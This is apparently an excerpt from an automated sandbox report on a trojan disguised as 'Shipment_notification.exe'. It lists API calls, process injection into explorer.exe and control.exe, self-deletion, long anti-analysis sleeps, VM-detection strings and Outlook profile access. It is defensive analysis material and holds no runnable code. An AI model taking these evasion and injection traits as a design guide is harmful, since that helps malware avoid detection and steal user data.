          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00401B302_2_00401B30
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004224612_2_00422461
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004055AD2_2_004055AD
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004055B32_2_004055B3
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00421E422_2_00421E42
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004206A32_2_004206A3
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004227522_2_00422752
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004057D32_2_004057D3
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0040BF902_2_0040BF90
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0040BF932_2_0040BF93
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0040179B2_2_0040179B
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004017A02_2_004017A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B041202_2_01B04120
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEF9002_2_01AEF900
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B120A02_2_01B120A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB20A82_2_01BB20A8
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFB0902_2_01AFB090
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BA10022_2_01BA1002
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1EBB02_2_01B1EBB0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB2B282_2_01BB2B28
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB22AE2_2_01BB22AE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B125812_2_01B12581
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AFD5E02_2_01AFD5E0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE0D202_2_01AE0D20
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB2D072_2_01BB2D07
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB1D552_2_01BB1D55
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AF841F2_2_01AF841F
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB1FF12_2_01BB1FF1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB2EF72_2_01BB2EF7
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: String function: 01AEB150 appears 35 times
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E5A3 NtCreateFile,2_2_0041E5A3
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E653 NtReadFile,2_2_0041E653
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E6D3 NtClose,2_2_0041E6D3
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E783 NtAllocateVirtualMemory,2_2_0041E783
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E64E NtReadFile,2_2_0041E64E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E77D NtAllocateVirtualMemory,2_2_0041E77D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041E7FD NtAllocateVirtualMemory,2_2_0041E7FD
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B299A0 NtCreateSection,LdrInitializeThunk,2_2_01B299A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_01B29910
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B298F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_01B298F0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29860 NtQuerySystemInformation,LdrInitializeThunk,2_2_01B29860
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29840 NtDelayExecution,LdrInitializeThunk,2_2_01B29840
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A20 NtResumeThread,LdrInitializeThunk,2_2_01B29A20
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_01B29A00
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A50 NtCreateFile,LdrInitializeThunk,2_2_01B29A50
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B295D0 NtClose,LdrInitializeThunk,2_2_01B295D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29540 NtReadFile,LdrInitializeThunk,2_2_01B29540
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B297A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_01B297A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29780 NtMapViewOfSection,LdrInitializeThunk,2_2_01B29780
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29FE0 NtCreateMutant,LdrInitializeThunk,2_2_01B29FE0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29710 NtQueryInformationToken,LdrInitializeThunk,2_2_01B29710
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B296E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_01B296E0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_01B29660
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B299D0 NtCreateProcessEx,2_2_01B299D0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29950 NtQueueApcThread,2_2_01B29950
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B298A0 NtWriteVirtualMemory,2_2_01B298A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29820 NtEnumerateKey,2_2_01B29820
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2B040 NtSuspendThread,2_2_01B2B040
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2A3B0 NtGetContextThread,2_2_01B2A3B0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29B00 NtSetValueKey,2_2_01B29B00
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A80 NtOpenDirectoryObject,2_2_01B29A80
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29A10 NtQuerySection,2_2_01B29A10
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B295F0 NtQueryInformationFile,2_2_01B295F0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2AD30 NtSetContextThread,2_2_01B2AD30
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29520 NtWaitForSingleObject,2_2_01B29520
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29560 NtWriteFile,2_2_01B29560
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29730 NtQueryVirtualMemory,2_2_01B29730
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2A710 NtOpenProcessToken,2_2_01B2A710
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29770 NtSetInformationFile,2_2_01B29770
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B2A770 NtOpenThread,2_2_01B2A770
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B29760 NtOpenProcess,2_2_01B29760
          Source: Shipment_notification.exe, 00000000.00000002.340502146.00000000035E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026B4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.00000000026A7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.336955451.0000000002627000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000000.00000002.353586112.0000000006DF0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOutimurs.dll2 vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000003.333262180.00000000018A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001A43000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A85000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCONTROL.EXEj% vs Shipment_notification.exe
          Source: Shipment_notification.exe, 00000002.00000002.378214888.0000000001BDF000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Shipment_notification.exe
          Source: Shipment_notification.exeBinary or memory string: OriginalFilenameCYYO.exe> vs Shipment_notification.exe
          Source: Shipment_notification.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: Shipment_notification.exeReversingLabs: Detection: 39%
          Source: Shipment_notification.exeVirustotal: Detection: 43%
          Source: Shipment_notification.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Shipment_notification.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exeJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess created: C:\Users\user\Desktop\Shipment_notification.exe C:\Users\user\Desktop\Shipment_notification.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exeJump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipment_notification.exe.logJump to behavior
          Source: C:\Windows\SysWOW64\control.exeFile created: C:\Users\user\AppData\Local\Temp\10W12dXJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/3@12/7
          Source: Shipment_notification.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\Shipment_notification.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Windows\SysWOW64\control.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: Shipment_notification.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Shipment_notification.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Shipment_notification.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: CYYO.pdb source: Shipment_notification.exe
          Source: Binary string: wntdll.pdbUGP source: Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: control.pdb source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: Shipment_notification.exe, Shipment_notification.exe, 00000002.00000003.336325695.0000000001924000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000003.333262180.0000000001790000.00000004.00000020.00020000.00000000.sdmp, Shipment_notification.exe, 00000002.00000002.378214888.0000000001AC0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004C0F000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.377463775.00000000047C0000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000004.00000002.581558007.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000004.00000003.379237530.0000000004950000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: CYYO.pdbSHA256 source: Shipment_notification.exe
          Source: Binary string: control.pdbUGP source: Shipment_notification.exe, 00000002.00000002.378125022.0000000001A80000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00411824 push ds; ret 2_2_00411825
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_004108E0 push ecx; retf 2_2_004108E1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041BC00 push eax; iretd 2_2_0041BC01
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00410CF7 push ecx; iretd 2_2_00410D0E
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041A550 push ecx; retf 2_2_0041A55A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041B56C push ss; retf 2_2_0041B56D
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041A523 push edx; ret 2_2_0041A524
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00405DEB push 00000056h; retf 2_2_00405DEF
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00401D80 push eax; ret 2_2_00401D82
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_0041B5B8 pushad ; iretd 2_2_0041B5B9
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00406E76 pushfd ; ret 2_2_00406E77
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00410631 push ecx; retf 2_2_00410632
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_00405F31 push ss; iretd 2_2_00405F51
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B3D0D1 push ecx; ret 2_2_01B3D0E4
          Source: initial sampleStatic PE information: section name: .text entropy: 7.877600970637655

          Hooking and other Techniques for Hiding and Protection

          barindex
          Deletes itself after installation
          Source: C:\Windows\SysWOW64\control.exeFile deleted: c:\users\user\desktop\shipment_notification.exeJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\control.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 1364Thread sleep time: -40023s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exe TID: 3648Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exe TID: 4540Thread sleep time: -44000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB5BA5 rdtsc 2_2_01BB5BA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 884Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 870Jump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread delayed: delay time: 40023Jump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000003.00000003.548908442.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.533768505.000000000EBFA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.535250683.000000000EC54000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.560492432.000000000EBFA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.550742798.000000000870B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.582481631.0000000004424000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000003.550742798.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.357414824.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01BB5BA5 rdtsc 2_2_01BB5BA5
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]2_2_01B651BE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]2_2_01B651BE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]2_2_01B651BE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B651BE mov eax, dword ptr fs:[00000030h]2_2_01B651BE
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B669A6 mov eax, dword ptr fs:[00000030h]2_2_01B669A6
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B161A0 mov eax, dword ptr fs:[00000030h]2_2_01B161A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B161A0 mov eax, dword ptr fs:[00000030h]2_2_01B161A0
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B12990 mov eax, dword ptr fs:[00000030h]2_2_01B12990
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B0C182 mov eax, dword ptr fs:[00000030h]2_2_01B0C182
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1A185 mov eax, dword ptr fs:[00000030h]2_2_01B1A185
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h]2_2_01AEB1E1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h]2_2_01AEB1E1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AEB1E1 mov eax, dword ptr fs:[00000030h]2_2_01AEB1E1
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B741E8 mov eax, dword ptr fs:[00000030h]2_2_01B741E8
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1513A mov eax, dword ptr fs:[00000030h]2_2_01B1513A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B1513A mov eax, dword ptr fs:[00000030h]2_2_01B1513A
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h]2_2_01B04120
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h]2_2_01B04120
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h]2_2_01B04120
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov eax, dword ptr fs:[00000030h]2_2_01B04120
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01B04120 mov ecx, dword ptr fs:[00000030h]2_2_01B04120
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h]2_2_01AE9100
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h]2_2_01AE9100
          Source: C:\Users\user\Desktop\Shipment_notification.exeCode function: 2_2_01AE9100 mov eax, dword ptr fs:[00000030h]2_2_01AE9100
